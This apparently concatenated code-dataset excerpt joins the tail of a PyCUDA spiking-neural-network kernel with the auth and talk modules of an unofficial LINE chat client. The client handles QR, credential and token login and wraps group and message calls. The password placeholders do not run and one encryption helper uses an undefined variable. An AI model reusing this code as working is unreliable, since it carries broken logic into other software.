if(clock==group_updates_queue[bx][first_index].clock) {
// update the input using the values from the queue
X[group_updates_queue[bx][first_index].input]=group_updates_queue[bx][first_index].weight;
}
atomicAdd(&already_on_queue[bx],-1); // FIXME: take care with parallel changes (consider A Parallel Counter Class - http://www.drdobbs.com/parallel/atomic-operations-and-low-wait-algorithm/240160177)
atomicAdd(&first_on_queue[bx],1);
atomicAnd(&first_on_queue[bx],MAX_GROUP_UPDATE_QUEUE_LEN-1); // next on cyclic buffer - optimization of modulo (no problem after previous atomic add, since during the transition
// between MAX_GROUP_UPDATE_QUEUE_LEN-1 to MAX_GROUP_UPDATE_QUEUE_LEN, these are orthogonal bits)
}
if (tx<INPUT_VECTOR_SIZE*NEURONS_IN_GROUP) {
atomicAdd(&AC[vec_num], X[tx+bx*INPUT_VECTOR_SIZE]);
if(AC[vec_num]>=TH[vec_num]) {
fired[vec_num]=1.0; // it is written over INPUT_VECTOR_SIZE times
printf("fired[%d]=%f on clock %d\\n", vec_num, fired[vec_num], clock);
} else {
//printf("under TH of fired[%d]=%f\\n", vec_num, fired[vec_num]);
}
}
}
__device__ void zero(float *x)
{
const uint tx = blockIdx.x *blockDim.x + threadIdx.x;
if (tx<INPUT_VECTOR_SIZE*NEURONS_IN_GROUP) {
x[tx]=0;
}
}
/*
* # spike distribution:
* # ===================
* # inside a block, run on the weights with a coalesced memory access, multiply by corresponding
* # fired array (the indices derived from C by [floor of] division to INPUT_VECTOR_SIZE). Update the
* # corresponding input (the indices are in C). When done, zero all fired array (assumption of
* # 1 clock decay of the spike).
* # Note: An attempt to update another group (block) is done using group_updates_queue mechanism.
*/
__device__ void update_inputs(float *ccA, float *ccC, float *fired, float *X, float *CSC_vectors_start_index, float *CSC_vectors_lengths, uint clock)
{
const uint tx = threadIdx.x;
const uint bx = blockIdx.x;
int a_len_index=0+bx*3;
int c_len_index=2+bx*3;
int a_index=tx+CSC_vectors_start_index[a_len_index];
int c_index=tx+CSC_vectors_start_index[c_len_index];
int input_index = ccC[c_index];
int fired_index = input_index/SYNAPSES_VECTOR_SIZE; // neuron number
int input_group=(input_index&GROUP_NUMBER_MASK)/INPUTS_PER_GROUP; // to which block goes the index
//printf("BLOCK %d\\n", bx);
if(tx<CSC_vectors_lengths[a_len_index]) { // running over (the relevat subarray of) A
//printf("block %d, input_index %d, MASK %x, GROUP NUM %d\\n", bx, input_index, GROUP_NUMBER_MASK, (input_index&GROUP_NUMBER_MASK)/INPUTS_PER_GROUP);
if(input_group==bx) { // updating current group
X[input_index] = ccA[a_index]*fired[fired_index];
printf("normal update in block %d for %d with %f\\n",bx, input_index, ccA[a_index]*fired[fired_index]);
} else { // must update a different group
if(fired[fired_index]>0.0) { // ignore on non fired neuron
printf("external update in block %d at clock %d for input %d with fired_index %d fire %f tell block %d\\n",bx, clock, input_index, fired_index, fired[fired_index], input_group);
if(already_on_queue[input_group]<MAX_GROUP_UPDATE_QUEUE_LEN) {
group_updates_queue[input_group][first_on_queue[input_group]].clock=clock;
group_updates_queue[input_group][first_on_queue[input_group]].input=input_index;
group_updates_queue[input_group][first_on_queue[input_group]].weight=ccA[a_index]*fired[fired_index];
already_on_queue[input_group]+=1;
} else {
printf("QUEUE TOO LONG on group %d! Spike will be ignored!!!\\n", input_group);
}
}
}
printf("tx %d fired[%d] %f ccA %f X %f\\n", tx, fired_index, fired[fired_index], ccA[a_index], X[input_index]);
}
}
__global__ void cycle(float *X, float *ccA, float *ccB, float * ccC, float *AC, float *TH, float *fired, float *CSC_vectors_start_index, float *CSC_vectors_lengths)
{
uint clock;
uint periods;
//if(blockIdx.x==0) {
// return;
//}
for(periods=0;periods<UPDATE_PERIODS;periods++) {
for(clock=0+periods*PERIODIC_UPDATE_CYCLES;clock<PERIODIC_UPDATE_CYCLES*(periods+1);clock++) {
zero(fired);
zero(AC);
__syncthreads();
sigma(X, AC, TH, fired, clock);
__syncthreads();
zero(X);
__syncthreads();
update_inputs(ccA, ccC, fired, X, CSC_vectors_start_index, CSC_vectors_lengths, clock);
__syncthreads();
}
//printf("PERIOD %d\\n", periods);
if(blockIdx.x==0){ // FIXME: condition should be "is non-dependant group?"
if (already_on_queue[1] == 0) {
safe_clock[1]=clock; // FIXME: atomic? clock-1?
printf("update clean SAFE to clock %d\\n", safe_clock[1]);
} else {
safe_clock[1]=group_updates_queue[1][first_on_queue[1]].clock; // FIXME: atomic? clock-1?
printf("update dirty SAFE to clock %d\\n", safe_clock[1]);
}
}
}
}
"""
kernel_code = kernel_code_template
mod = SourceModule(kernel_code)
################################################################
#
# debug before running kernel
#
################################################################
debug("inputs",X)
debug("thresholds", TH_gpu.get())
################################################################
#
# running kernel
#
################################################################
cycle = mod.get_function("cycle")
cycle(X_gpu, ccA_gpu, ccB_gpu, ccC_gpu, AC_gpu, TH_gpu, fired_gpu, CSC_vectors_start_index_gpu, CSC_vectors_lengths_gpu, block=(SYNAPSES_VECTOR_SIZE*NEURONS_IN_GROUP,1,1), grid=(GROUPS_AMOUNT,1))
################################################################
#
# debug after running kernel
#
################################################################
debug("last fired neurons", fired_gpu.get())
debug("inputs after running network", X_gpu.get())
if __name__ == "__main__":
run()
#
# improvement options to examine:
# ===============================
# parallel sum during AC calculation (complexity drop fron o(n) to o(log n), but maybe for
# such small input amounts per neuron it doesn't make sense.
#
# loop unrolling.
``` |
{
"source": "4masaka/AsyncLine",
"score": 2
} |
#### File: AsyncLine/AsyncLine/auth.py
```python
import os, sys
import hmac
import time
import base64
import asyncio
import hashlib
import rsa
import requests
from . import config
from . import log
from .models import SyncAsync, ApplicationHeader
from .connections import Connection
from .lib.Gen.ttypes import *
logs = log.LOGGER
class Auth(Connection):
def __init__(self, client, storage):
super().__init__(config.MAIN_PATH)
self.cli = client
self.LA, self.UA = self.cli.LA, self.cli.UA
self.updateHeaders({
'User-Agent': self.UA,
'X-Line-Application': self.LA,
'X-Line-Carrier': config.CARRIER,
"x-lal":"in_ID"
})
self.token_db = storage
self.afterLoginRemote = []
def remote(self, *func):
self.afterLoginRemote.extend(func)
#crypto
def __write_val(self, data):
return (chr(len(data)) + data)
def __gen_message(self, tuple_msg):
return (''.join(tuple_msg)).encode('utf-8')
def __rsa_crypt(self, message,RSA):
pub_key = rsa.PublicKey(int(RSA.nvalue, 16), int(RSA.evalue, 16))
crypto = rsa.encrypt(message, pub_key)
return crypto
def _encryptedEmailAndPassword(self, mail, passwd, RSA):
message_ = (
self.__write_val(RSA.sessionKey),
self.__write_val(mail),
self.__write_val(passwd),
)
message = self.__gen_message(message_)
crypto = self.__rsa_crypt(message, RSA).hex()
return crypto
def _encryptedPassword(self, phone, password, RSA):
message_ = (
self.__write_val(RSA.sessionKey),
self.__write_val(phone),
self.__write_val(passwd),
)
message = self.__gen_message(message_)
crypto = self.__rsa_crypt(message, RSA).hex()
return crypto
def waitForPhoneConfirm(self, verifier):
r = requests.get(config.BASE_URL + config.WAIT_FOR_MOBILE_PATH, headers={
'X-Line-Access': verifier
})
return r
def checkmail(self, mail):
if mail.endswith(".session"):
if os.path.exists(mail):
return True
def _validate_col(self, *val):
r = self.token_db.auth_col.find_one(*val)
if r:
return True
else:
return False
async def createLoginSession(self, name, token, mail, passwd, certt, qr):
if token is not None:
await self.loginWithAuthToken(token)
elif mail and passwd is not None:
if self.token_db is not None:
_name = name if name else mail
if self._validate_col({'name': _name, 'mail': mail}):
c = self.token_db.auth_col.find_one({'name': _name, 'mail': mail})
await self.loginWithCredential(mail=mail, password=<PASSWORD>, cert=c['cert'])
else:
await self.loginWithCredential(mail=mail, password=<PASSWORD>, name=_name)
else:
pname = name if name else mail +".session"
if self.checkmail(pname):
y = open(pname, "r").read().strip()
await self.loginWithCredential(mail=mail, password=<PASSWORD>, cert=y)
else:
await self.loginWithCredential(mail=mail, password=<PASSWORD>,
path = pname)
elif mail and passwd and cert is not None:
await self.loginWithCredential(mail=mail, password=<PASSWORD>, cert=certt)
elif qr and name is not None:
if self.token_db is not None:
if self._validate_col({'name': name}):
token = self.token_db.auth_col.find_one({'name': name})
await self.loginWithAuthToken(token['token'])
else:
await self.loginWithQrcode(name)
elif not self.token_db and name is not None and os.path.exists(name+'.session'):
token = open(name+'.session', "r").read()
await self.loginWithAuthToken(token.split(">")[1])
else:
await self.loginWithQrcode(path=name+".session" if name else None)
else:
raise ValueError("Must pass once paramater for login")
logs.info("Login success as %s" % (self.profile.displayName))
return True
async def loginWithQrcode(self, path=None):
self.url(config.MAIN_PATH)
qr = await self.call('getAuthQrcode', True, "AsyncLine", "")
print("line://au/q/"+qr.verifier)
r = self.waitForPhoneConfirm(qr.verifier)
vr = r.json()['result']['verifier']
self.url(config.AUTH_PATH)
rq = LoginRequest(
LoginType.QRCODE,
IdentityProvider.LINE,
None,
None,
True,
config.LOGIN_LOCATION,
"AsyncLine",
None,
vr,
None,
2
)
lr = await self.call('loginZ', rq)
self.updateHeaders({
'X-Line-Access': lr.authToken
})
self.authToken = lr.authToken
self.cert = lr.certificate
if path and path.endswith(".session"):
with open(path, "w") as fp:
text = "auth > {}".format(lr.authToken)
fp.write(text)
elif self.token_db is not None:
if not self._validate_col({'name': path}):
self.token_db.auth_col.insert_one({
'name': path,
'token': self.authToken
})
await self.afterLogin()
async def loginWithCredential(self, mail, password, name=None, cert=None, path=None):
self.url(config.MAIN_PATH)
rsakey = await self.call('getRSAKeyInfo', config.LOGIN_PROVIDER)
crypt = self._encryptedEmailAndPassword(mail, password, rsakey)
self.url(config.AUTH_PATH)
rq = LoginRequest(
LoginType.ID_CREDENTIAL,
IdentityProvider.LINE_PHONE,
rsakey.keynm,
crypt,
True,
config.LOGIN_LOCATION,
"AsyncLine",
cert,
None,
crypt.encode() if type(crypt) == str else crypt, #none, #crypt
0
)
result = await self.call('loginZ', rq)
self.url(config.MAIN_PATH)
if result.type == 3:
print("Please confirm this code on your device %s"% (result.pinCode))
r = self.waitForPhoneConfirm(result.verifier)
rq = LoginRequest(
LoginType.QRCODE,
IdentityProvider.LINE,
None, None, True,
config.LOGIN_LOCATION,
self.LA.split('\t')[0],
cert, r.json()['result']['verifier'],
None,
2
)
self.url(config.AUTH_PATH)
result = await self.call('loginZ', rq)
self.updateHeaders({
'X-Line-Access': result.authToken,
})
self.authToken = result.authToken
self.cert = result.certificate
self.url(config.MAIN_PATH)
elif result.type == 1:
self.authToken = result.authToken
self.cert = result.certificate
self.updateHeaders({
'X-Line-Access': result.authToken
})
else:
logs.critical('Login failed. got result type `%s`' % (result.type))
if path is not None:
with open(path, "a") as fp:
text = "\n{}".format(self.cert)
fp.write(text)
elif self.token_db is not None and name is not None:
if not self._validate_col({'name': name, 'mail': mail}):
if cert is None:
self.token_db.auth_col.insert_one({
'mail': mail,
'name': name,
'cert': self.cert
})
else:
r = self.token_db.auth_col.find_one({'name': name,'mail': mail})
if 'cert' not in r.keys():
self.token_db.auth_col.update_one({
'name': name,
'mail': mail
}, {'$set': {'cert': self.cert}})
await self.afterLogin()
async def loginWithAuthToken(self, authToken, path=None):
self.url(config.MAIN_PATH)
self.updateHeaders({
'X-Line-Access': authToken
})
self.authToken = authToken
await self.afterLogin()
async def afterLogin(self):
self.url(config.NORMAL_PATH)
self.profile = await self.call('getProfile')
self.last_rev = await self.call('getLastOpRevision')
self.settings = await self.call('getSettings')
#self.groups_ids = await self.call('getGroupIdsJoined')
self.authToken = self.authToken
for remoteFunc in self.afterLoginRemote:
remoteFunc(**{
'profile': self.profile,
'settings': self.settings,
'rev': self.last_rev,
#'groups_ids': self.groups_ids,
'mid': self.profile.mid,
'authToken': self.authToken,
'cert': getattr(self, 'cert', None),
'app_header': (self.LA, self.UA),
})
async def logout(self):
await self.call("logoutZ")
```
#### File: AsyncLine/AsyncLine/talk.py
```python
from .auth import Auth
from . import config as Config
from .lib.Gen.ttypes import *
from typing import Union, Any, List
from .connections import Connection
from random import randint
import asyncio, json
class Talk(Connection):
_unsendMessageReq = 0
def __init__(self, auth):
super().__init__("/S4")
self.auth = auth
self.cl = auth.cli
self.updateHeaders({
'user-agent': self.auth.UA,
'x-line-application': self.auth.LA,
})
def afterLogin(self, *args, **kws):
for k,v in kws.items():
try:
setattr(self, k, v)
except:
pass
self.updateHeaders({
"X-Line-Access": self.authToken
})
async def acquireEncryptedAccessToken(self, featureType: int = 2) -> str:
"""
Use this method for get your Encryption Token.
Args:
featureType class :lib.Gen.ttypes.FeatureType:
1 = OBS_VIDEO
2 = OBS_GENERAL
Return:
<class 'str'>
"""
return await self.call("acquireEncryptedAccessToken", featureType)
async def getProfile(self) -> Profile:
"""
A simple method for get your infomations. Requires no parameters.
Return:
class <class 'AsyncLine.lib.Gen.ttypes.Profile'>
"""
return await self.call("getProfile")
async def getSettings(self) -> Settings:
"""
A simple method for testing your Settings. Requires no parameters.
Return:
class <class 'AsyncLine.lib.Gen.ttypes.Settings'>
"""
return await self.call("getSettings")
async def getUserTicket(self) -> Union[str, Ticket]:
"""
A simple method for create your ticket. Requires no parameters.
Return:
class <class 'AsyncLine.lib.Gen.ttypes.Ticket'>
"""
return await self.call("getUserTicket")
async def generateUserTicket(self,
expirationTime: int = 100,
maxUseCount: int = 100) -> Ticket:
"""
Use this method for genereate your Ticket.
Args:
expirationTime: number for your Ticket until this expiration
maxUseCount: number for set max user can used your Ticket
Return:
class <class 'AsyncLine.lib.Gen.ttypes.Ticket'>
"""
try:
return await self.getUserTicket()
except:
await self.reissueUserTicket(expirationTime, maxUseCount)
return await self.getUserTicket()
async def reissueGroupTicket(self, chat_id: str) -> str:
"""
Use this method for getting group Ticket.
Args:
chat_id: string of chat_id
Return:
class :str:
"""
return await self.call("reissueGroupTicket", chat_id)
async def reissueUserTicket(self, expirationTime: int = 100, maxUseCount: int = 10) -> str:
"""
Use this method for genereate your Ticket.
Args:
expirationTime: number for your Ticket until this expiration
maxUseCount: number for set max user can used your Ticket
Return:
class :str:
"""
return await self.call("reissueUserTicket", expirationTime, maxUseCount)
async def updateProfile(self, profile_obj: Profile) -> bool:
"""
Use this method for change your Profile Attribute.
Args:
profile_obj: profile obj from <class 'AsyncLine.lib.Gen.ttypes.Profile'>
Return:
bool == false, because this will returning NoneType as False
"""
return bool(await self.call("updateProfile", 0, profile_obj))
async def updateSettings(self, settings_obj: Settings) -> bool:
"""
Use this method for change your Settings Attribute.
Args:
settings_obj: settings obj from <class 'AsyncLine.lib.Gen.ttypes.Settings'>
Return:
bool == false, because this will returning NoneType as False
"""
return bool(await self.call("updateSettings", 0, settings_obj))
async def updateProfileAttribute(self, attribute: ProfileAttribute, value: str) -> bool:
"""
Use this method for change your ProfileAttribute.
Args:
attribute: int of ProfileAttribute <class 'AsyncLine.lib.Gen.ttypes.ProfileAttribute>
ALL = 511
EMAIL = 1
DISPLAY_NAME = 2
PHONETIC_NAME = 4
PICTURE = 8
STATUS_MESSAGE = 16
ALLOW_SEARCH_BY_USERID = 32
ALLOW_SEARCH_BY_EMAIL = 64
BUDDY_STATUS = 128
MUSIC_PROFILE = 256
value: value for attribute will passed as string
Return:
bool == false, because this will returning NoneType as False
"""
return bool(await self.call("updateProfileAttribute", 0, attribute, value))
async def updateContactSetting(self, mid: str, attribute: int, value: str):
"""
Use this method to Update your ContactSettings.
Args:
attribute: int of ContactSettings <class 'AsyncLine.lib.Gen.ttypes.ProfileAttribute>
CONTACT_SETTING_NOTIFICATION_DISABLE = 1
CONTACT_SETTING_DISPLAY_NAME_OVERRIDE = 2
CONTACT_SETTING_CONTACT_HIDE = 4.
CONTACT_SETTING_FAVORITE = 8
CONTACT_SETTING_DELETE = 16
value: value for attribute will passed as string
Return:
bool == false, because this will returning NoneType as False
"""
return bool(await self.call("updateContactSetting", 0, mid, attribute, value))
async def disableNotifContact(self, mid, str):
"""
A simple method for disable notification message from your contact.
Args:
mid: string of user mid
Return:
bool == false, because this will returning NoneType as False
"""
return bool(await self.updateContactSetting(mid, 1, "True"))
async def renameContact(self, mid: str, new_name: str):
"""
A simple method for disable rename your contact.
Args:
mid: string of user mid
Return:
bool == false, because this will returning NoneType as False
"""
return bool(await self.updateContactSetting(mid, 2, new_name))
async def addContactToHiddenList(self, mid: str):
"""
A simple method for add your contact into hidden list.
Args:
mid: string of user mid
Return:
bool == false, because this will returning NoneType as False
"""
return bool(await self.updateContactSetting(mid, 4, "True"))
async def addContactToFavouriteList(self, mid: str):
"""
A simple method for add your contact into favorite list.
Args:
mid: string of user mid
Return:
bool == false, because this will returning NoneType as False
"""
return bool(await self.updateContactSetting(mid, 8, "True"))
async def deleteContact(self, mid):
"""
A simple method for deleted your friend contact.
Args:
mid: string of user mid
Return:
bool == false, because this will returning NoneType as False
"""
return bool(await self.updateContactSetting(mid, 16, "True"))
async def removeContactFromHiddenList(self, mid: str):
"""
A simple method for remve your contact into hidden list.
Args:
mid: string of user mid
Return:
bool == false, because this will returning NoneType as False
"""
return bool(await self.updateContactSetting(mid, 4, "False"))
async def removeContactFromFavouriteList(self, mid: str):
"""
A simple method for remve your contact into hidden favorite list.
Args:
mid: string of user mid
Return:
bool == false, because this will returning NoneType as False
"""
return bool(await self.updateContactSetting(mid, 8, "False"))
async def getContacts(self, mids: Union[str, list, tuple]) -> Union[Contact, list]:
"""
Use this method to get information from specifiec mid
Args:
mids: pass string or multiple mids as list of strings for getting
more than one Contact at once.
Return:
<class 'AsyncLine.lib.Gen.ttypes.Contact>
or
<class 'list'>
"""
mids = mids if isinstance(mids, (list, tuple)) else [mids]
if len(mids) <= 1:
return await self.call("getContact", mids[0])
else:
return await self.call("getContacts", mids)
async def blockContact(self, mids: Union[str, list, tuple]) -> bool:
"""
Use this method to block contacts from specifiec mid
Args:
mids: pass string or multiple mids as list of strings for blocking
more than one Contact at once.
Return:
bool == false, because this will returning NoneType as False
"""
if isinstance(mids, str):
return bool(await self.call("blockContact", 0, mids))
elif isinstance(mids, (list, tuple)):
for mid in mids:
bool(await self.call("blockContact", 0, mid))
async def unblockContact(self, mids: Union[str, list, tuple]) -> bool:
"""
Use this method to unblock contacts from specifiec mid
Args:
mids: pass string or multiple mids as list of strings for unblocking
more than one Contact at once.
Return:
bool == false, because this will returning NoneType as False
"""
if isinstance(mids, str):
return bool(await self.call("unblockContact",0, mids, ""))
elif isinstance(mids, (list, tuple)):
for mid in mids:
bool(await self.call("unblockContact",0, mid, ""))
async def findAndAddContactsByMid(self, mids: str) -> bool:
"""
Use this method to find and add contact by mid
Args:
mids: string of mids users
Return:
bool == false, because this will returning NoneType as False
"""
return bool(await self.call("findAndAddContactsByMid", 0, mids, 0, ""))
async def findAndAddContactsByUserid(self, user_id: str) -> bool:
"""
Use this method to find and add contact by user_id
Args:
user_id: pass string from user id
Return:
bool == false, because this will returning NoneType as False
"""
return bool(await self.call("findAndAddContactsByUserid", 0, user_id))
async def findContactByUserid(self, user_id: str) -> Contact:
"""
Use this method to find contact by user_id
Args:
user_id: pass string of user id
Return:
<class 'AsyncLine.lib.Gen.ttypes.Contact'>
"""
return await self.call("findContactByUserid", user_id)
async def findContactByTicket(self, ticket: str) -> Contact:
"""
Use this method to find contact by ticket user
Args:
ticket: pass string of user id
Return:
<class 'AsyncLine.lib.Gen.ttypes.Contact'>
"""
return await self.call("findContactByUserTicket", ticket)
async def getChatRoomAnnouncements(self, chat_ids: Union[list, str]) -> List[ChatRoomAnnouncement]:
return await self.call("getChatRoomAnnouncements", chat_ids)
async def removeChatRoomAnnouncement(self, chat_id: str, announceSeq: int):
return await self.call("removeChatRoomAnnouncement", 0, chat_id, announceSeq)
async def createChatRoomAnnouncement(self,
message: Message,
text: str,
thumbnail=None,
link = None) -> ChatRoomAnnouncement:
content = ChatRoomAnnouncementContents(
displayFields = 11,
text = text,
link =link if link else "line://nv/chatMsg?chatId=%s&messageId=%s" % (message.to, message.id),
thumbnail = thumbnail
)
return await self.call("createChatRoomAnnouncement", 1, message.to, 0, content)
async def getRecentMessages(self, messageBoxId, messagesCount):
return await self.call("getRecentMessagesV2", messageBoxId, messagesCount)
async def getPreviousMessagesWithReadCount(self,
message: Message,
messagesCount: int = 10) -> Message:
id = MessageBoxV2MessageId(message.createdTime, int(message.id))
return await self.call("getPreviousMessagesV2WithReadCount", message.to, id, messagesCount)
async def getServerTime(self) -> int:
return await self.call("getServerTime")
async def getAllContactIds(self) -> list:
"""
A simple method to get all of mid from your contacts
Return:
<class 'list'>
"""
return await self.call("getAllContactIds")
async def getBlockedContactIds(self) -> list:
"""
A simple method to get all of mid from your blocked contacts
Return:
<class 'list'>
"""
return await self.call("getBlockedContactIds")
async def getFavoriteMids(self) -> list:
"""
A simple method to get all of mid from your favorite contacts
Return:
<class 'list'>
"""
return await self.call("getFavoriteMids")
async def getHiddenContactMids(self) -> list:
"""
A simple method to get all of mid from your hidden contacts
Return:
<class 'list'>
"""
return await self.call("getHiddenContactMids")
async def createGroup(self, name: str, mid_users: list) -> bool:
"""
Use this method to create group and invite all user using mids
Args:
name: string of name group for group creating
mid_users: list of mids user want to invite
Return:
bool == False, because this will returning NoneType as False
"""
return bool(await self.call("createGroup", 0, name, mid_users))
async def getGroups(self, chat_ids: Union[str, list]) -> Union[list, Group]:
"""
Use this method to get Informations about group
Args:
chat_ids: string or multiple chat_ids of list
for getting more than once
Return:
<class 'AsyncLine.lib.Gen.ttypes.Group'> if chat_ids only one
if list returned <class 'list'>
"""
ids = chat_ids if isinstance(chat_ids, list) else [chat_ids]
if len(ids) <= 1:
return await self.call("getGroup", ids[0])
else:
return await self.call("getGroups", ids)
async def getGroupWithoutMembers(self, chat_id: str) -> Group:
"""
Use this method to get Informations about group exclude Contact classes
Args:
chat_id: string of chat_id
Return:
<class 'AsyncLine.lib.Gen.ttypes.Group'>
"""
return await self.call("getGroupWithoutMembers", chat_id)
async def getGroupsV2(self, chat_id: Union[list, str]) -> Group:
"""
Use this method to get Custom Informations about group
include Mid of list members and Mid of list pending members
more than fasted than getGroups and getCompactGroup
Args:
chat_id: string of chat_id
Return:
<class 'AsyncLine.lib.Gen.ttypes.Group'>
or <class 'list'>
"""
return await self.call("getGroupsV2", chat_id)
async def getCompactGroup(self, chat_id: str) -> Group:
"""
Use this method to get Compact Informations about group
exclude some data and fasted than getGroups
Args:
chat_id: string of group id
Return:
<class 'AsyncLine.lib.Gen.ttypes.Group'>
"""
return await self.call("getCompactGroup", chat_id)
async def getGroupIdsInvited(self) -> list:
"""
Use this method to get all id of you have invited
Return:
<class 'list'>
"""
return await self.call("getGroupIdsInvited")
async def getGroupIdsJoined(self) -> list:
"""
Use this method to get all id of you have joined
Return:
<class 'list'>
"""
return await self.call("getGroupIdsJoined")
async def acceptGroupInvitation(self, chat_id: str, ticket: str = None) -> bool:
"""
Use this method to join into specifiec chat_id, or using ticket id if not None
Args:
chat_id: string of chat_id
ticket: string of ticket from group
Return:
bool == False, because this will returning NoneType as False
"""
if ticket is not None:
return bool(await self.call("acceptGroupInvitationByTicket", 0, chat_id, ticket))
else:
return bool(await self.call("acceptGroupInvitation", 0, chat_id))
async def cancelGroupInvitation(self, chat_id: str, mid_users: Union[str, list]) -> bool:
"""
Use this method to cancel invitation user from group
Args:
chat_id: string of id from group id
mid_users: string or multiple list of string from mid_users
to cancel more than once
Return:
bool == False, because this will returning NoneType as False
"""
mid_users = mid_users if isinstance(mid_users, list) else [mid_users]
if len(mid_users) >= 1:
for mid in mid_users:
bool(await self.call("cancelGroupInvitation", 0, chat_id, [mid]))
else:
return bool(await self.call("cancelGroupInvitation", 0, chat_id, mid_users))
async def inviteIntoGroup(self, chat_id: str, mid_users: list) -> bool:
"""
Use this method to invite some or many user into group
Args:
chat_id: string of id from group id
mid_users: string or multiple list of string from mid_users
to invite more than once
Return:
bool == False, because this will returning NoneType as False
"""
mids = mid_users if isinstance(mid_users, list) else [mid_users]
return bool(await self.call("inviteIntoGroup", 0, chat_id, mids))
async def kickoutFromGroup(self, chat_id: str, mid_users: Union[str, list]) -> bool:
"""
Use this method to kick some or many user from group
Args:
chat_id: string of id from group id
mid_users: string or multiple list of string from mid_users
to kick more than once
Return:
bool == False, because this will returning NoneType as False
"""
mids = mid_users if isinstance(mid_users, list) else [mid_users]
if len(mids) > 1:
for mid in mids:
bool(await self.call("kickoutFromGroup", 0, chat_id, [mid]))
else:
return bool(await self.call("kickoutFromGroup", 0, chat_id, mids))
async def leaveGroup(self, chat_id: str) -> bool:
"""
Use this method to leave from group
Args:
chat_id: string of id from group id
Return:
bool == False, because this will returning NoneType as False
"""
return bool(await self.call("leaveGroup", 0, chat_id))
async def rejectGroupInvitation(self, chat_id: str) -> None:
"""
Use this method to reject group you have invited
Args:
chat_id: string of id from group id, see self.getGroupIdsInvited
Return:
bool == False, because this will returning NoneType as False
"""
return bool(await self.call("rejectGroupInvitation", 0, chat_id))
async def updateGroupPreferenceAttribute(self, chat_id:str, attribute: dict) -> bool:
"""
Use this method to update yoir Preference attribute of group
Args:
chat_id: string of id from group id
attribute: dict of attribute from {<class 'AsyncLine.lib.Gen.ttypes.GroupPreferenceAttribute'>, string}
INVITATION_TICKET = 1
FAVORITE_TIMESTAMP = 2
e.g: cl.updateGroupPreferenceAttribute(chat_id, {1: "True"})
Return:
bool == False, because this will returning NoneType as False
"""
return bool(await self.call("updateGroupPreferenceAttribute", 0, chat_id, attribute))
async def updateGroup(self, obj: Union[Group]) -> bool:
"""
Use this method to update Group attribute
Args:
obj: object from Group classes <class 'AsyncLine.lib.Gen.ttypes.Group'>
e.g:
group = cl.getGroup(chat_id)
group.preventedJoinByTicket = False
cl.updateGroup(group)
this will disable Joining by ticket group
Return:
bool == False, because this will returning NoneType as False
"""
return bool(await self.call("updateGroup", 0, obj))
async def getRoom(self, room_id: str) -> Room:
"""
Use this method to get Room Informations
Args:
room_id: string of room_id
Return:
<class 'AsyncLine.lib.Gen.ttypes.Room'>
"""
return await self.call("getRoom", room_id)
async def getCompactRoom(self, room_id: str) -> Room:
"""
Use this method to get Compact Room Informations
fasted than getRoom
Args:
room_id: string of room_id
Return:
<class 'AsyncLine.lib.Gen.ttypes.Room'>
"""
return await self.call("getCompactRoom", room_id)
async def inviteIntoRoom(self,room_id:str, mid_users: Union[str, list]) -> bool:
"""
Use this method to invite some or many user into room
Args:
room_id: string of id from room id
mid_users: string or multiple list of string from mid_users
to invite more than once
Return:
bool == False, because this will returning NoneType as False
"""
mids = mid_users if isinstance(mid_users, list) else [mid_users]
return await self.call("inviteIntoRoom", 0, room_id, mids)
async def leaveRoom(self, room_id: str) -> bool:
"""
Use this method to leave from room
Args:
room_id: string of id from room id
Return:
bool == False, because this will returning NoneType as False
"""
return await self.call("leaveRoom", 0, room_id)
async def sendChatRemoved(self, mid, message_id):
return await self.call("sendChatRemoved", 0, mid, message_id, randint(0, 10))
async def sendChatChecked(self, mid, message_id):
return await self.call('sendChatChecked', 0, mid, message_id, randint(0, 10))
async def sendMention(self,
chat_id: str,
mids: list = [],
separator: str = "\n",
first_text: str = None,
end_text: str = None,
enum: bool = False,
pretty: bool = True):
"""
Use this method to Send Mention to all or some user.
Args:
chat_id: string from chat_id or room_id
mids: string of list from user mids at group
separator: (string | None, optional) of separator to separate each line of mention
first_text: (string | None, optional) of texts that will be on top mentioning
end_text: (string | None, optional) of text that will be on end line of mentioning
pretty: bool if True mention will be output pretty readable
enum: bool if True mention will be separate with numerate
i.e;
1. @user1
2. @user2
if separator is not None and enum is True this will output like
- 1. @user1
- 2. @user2
using "-" as separator
Return:
<class 'bool'> or <class 'AsyncLine.lib.Gen.ttypes.Room'>
"""
mids = mids if isinstance(mids, list) else [mids]
lenght_mids = len(mids)//20+1
text = '' if first_text is None else first_text
mention = '@m{}'.format('\n' if pretty else ' ')
for count in range(lenght_mids):
mentionees = []
if enum:
for no, mid in enumerate(mids[count*20:(count+1)*20], 1):
text += '{}{}. {}'.format(separator, no, mention)
slen = len(text) - 3
elen = len(text) + 3
mentionees.append({'S': str(slen), 'E': str(elen - 4), 'M': mid})
if mid == mids[-1]:
text += '' if end_text is None else end_text
else:
for mid in mids[count*20:(count+1)*20]:
text += '%s%s' % (separator, mention)
slen = len(text) - 3
elen = len(text) + 3
mentionees.append({'S': str(slen), 'E': str(elen - 4), 'M': mid})
if mid == mids[-1]:
text += '' if end_text is None else end_text
if text:
if text.endswith("\n"):
text = text[:-1]
await self.sendMessage(chat_id, text, {'MENTION': json.dumps({'MENTIONEES': mentionees})}, 0)
text = ""
async def sendLocation(self,
chat_id: str,
address: str,
latitude: float,
longitude: float,
phone: str = None,
title: str = None
) -> Union[str, Message]:
"""
Use this method to sending a Location
Args:
chat_id: string of mid from group id
address: string of your address location
latitude: float of your address latitude
longitude: float of your address longitude
phone: string of your number phone (optional)
title: string that will be show on Location content
Return:
<clas 'Message'>
"""
location = Location(title="Location" if not title else title,
address=address,
phone=phone,
latitude=latitude,
longitude=longitude,
)
return await self.sendMessage(chat_id, text="", location=location)
async def sendMessage(self,
chat_id: str,
text: str,
contentMetadata: dict = None,
contentType: int = 0,
*args, **kwrgs
) -> Union[str, Message]:
"""
Use this method to sending Message containt any types
Args:
chat_id: string of mid from group id
text: string of some text
contentMetadata: dict of contentMetadata for sending
contentType: int of contentType see <class 'AsyncLine.lib.Gen.ttypes.ContentType'>
Return:
<class 'AsyncLine.lib.Gen.ttypes.Message'>
"""
msg = Message(to=chat_id,
text = text,
contentType = contentType,
contentMetadata = {'LINE_RECV':'1'}
if contentMetadata is None \
else contentMetadata,
*args, **kwrgs
)
return await self.call("sendMessage", 0, msg)
async def sendReply(self,
relatedMessage_id: str,
chat_id: str,
text: str,
contentMetadata: dict = None,
contentType: int = 0
) -> Union[str, Message]:
"""
Use this method to sending Reply Message containt any types
Args:
relatedMessage_id: string of Message.id from user or self
chat_id: string of mid from group id
text: string of some text that will be sending
